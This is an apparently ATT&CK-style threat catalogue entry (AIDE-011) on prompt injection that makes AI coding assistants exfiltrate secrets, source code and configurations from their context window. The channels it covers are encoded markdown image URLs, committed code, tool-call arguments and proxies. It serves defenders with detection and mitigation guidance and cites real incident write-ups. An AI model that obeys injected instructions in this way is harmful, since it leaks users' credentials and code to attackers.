AIDE-011 Collection Exfiltration Coverage D GAP CANDIDATE Exfiltration Collection

Context Window Sensitive Data Exfiltration

AIDE-011 |

Description

Adversary Behavior: Adversaries exfiltrate data through the output channels of AI systems integrated into development environments by manipulating an AI assistant's behavior through prompt injection to collect and transmit sensitive data from its context window.

AI/IDE Mechanism: The LLM's native context assembly mechanism serves as the collection system — the adversary does not deploy separate collection tooling but instead subverts the AI's existing access to project files and environment data. The context window contains source code, credentials, API schemas, and infrastructure configurations assembled by the IDE during normal operation.

Execution Path: The adversary directs the AI system through prompt injection to collect sensitive data from its context window and transmit it through available output channels. Exfiltration channels include: markdown or HTML rendering that triggers network requests to adversary-controlled URLs with data encoded in the request path or parameters; code generation that embeds sensitive data in output committed to adversary-accessible repositories; tool invocation arguments that include sensitive data in web requests or file write operations; and AI API traffic routed through adversary-controlled proxies.

Security Impact: Sensitive data including source code, credentials, API schemas, and infrastructure configurations are exfiltrated through channels that are difficult to distinguish from legitimate AI assistant operations, bypassing traditional DLP controls designed for conventional exfiltration patterns.

Platforms

Windows macOS Linux

Detection

Inspect LLM-generated output for encoded data patterns (base64, URL encoding) in unexpected contexts such as markdown image references, URLs, and code comments. Monitor network requests triggered by rendering LLM output content. Compare data in outbound requests against sensitive content present in the context window.

Detecting Data Components (4)

Prompt Content

Full text of prompts sent to the LLM including system prompts, user instructions, and assembled context.

Response Content

Full text of LLM responses including generated code, explanations, and tool call requests.

File Context Inclusion

Events capturing which local files are included in the LLM context window for each inference request.

Token Metadata

Metadata about inference requests including token counts, model selection, latency, and processing parameters.

Mitigations (1)

LLM Output Validation and Encoding Detection

Scan LLM-generated output for encoded data patterns (base64, URL encoding), embedded URLs, and content that diverges from the prompt intent. Implement output content policies that block exfiltration patterns in generated code, markdown rendering, and tool invocations.

Data Sources

Network Traffic → Network Connection Creation

Network Traffic → Network Traffic Content

Application Log → Application Log Content

References

mitre-attack

CANDIDATE GAP — Proposed sub-technique of T1041 Exfiltration Over C2 Channel.

ToolLeak Prompt Exfiltration

Red-Teaming Coding Agents from a Tool-Invocation Perspective: An Empirical Security Assessment

https://arxiv.org/abs/2509.05755

CamoLeak (Legit Security, Jun 2025)

GitHub Copilot PR data exfiltration via camo URLs — zero-click secret extraction from context window. CVSS 9.6.

https://www.legitsecurity.com/blog/camoleak

EchoLeak — CVE-2025-32711 (Aim Security, Jun 2025)

Zero-click data exfiltration from Microsoft 365 Copilot via markdown email injection. CVSS 9.3.

https://www.aim.security/research/echoleak

ChatGPT SpAIware (Rehberger, Sep 2024)

Persistent data exfiltration from ChatGPT via memory poisoning — retrieval-independent persistence across sessions.

https://arxiv.org/abs/2412.06090

IDEsaster CVEs

JSON schema validation exfiltration — secrets written to JSON with remote $schema URL trigger HTTP validation request carrying sensitive data (Marzouk, 2025-2026)

https://byteiota.com/idesaster-30-cves-hit-cursor-github-copilot-all-ai-ides/

Knostic - AI Assistants Leak Secrets

AI assistants automatically ingest .env and config files, exposing secrets through context window without explicit user action (Knostic, 2025)

https://www.knostic.ai/blog/ai-coding-assistants-leaking-secrets

Log-To-Leak

Post-hoc additive attack — agent completes task then covertly invokes malicious logging tool; up to 100% ASR on GPT-5; prompt sandwiching and DataSentinel fail (OpenReview/ICLR 2026 submission, 2025)

https://openreview.net/forum?id=UVgbFuXPaO

RoguePilot

Passive prompt injection via GitHub Issues exfiltrates GITHUB_TOKEN using JSON $schema download and symlink traversal — full repository takeover (Orca Security, 2025)

https://orca.security/resources/blog/roguepilot-github-copilot-vulnerability/

STIX Metadata

type	attack-pattern
id	attack-pattern--a0c13a6a-21b3-4054-85c3-a2e3b6e037fe
spec_version	2.1
created	2026-02-23T00:00:00.000Z
modified	2026-02-23T00:00:00.000Z
created_by_ref	identity--f5b5ec62-ffbd-4afd-9ee5-7c648406e189
x_mitre_is_subtechnique	False
x_mitre_version	0.1
x_mitre_status	candidate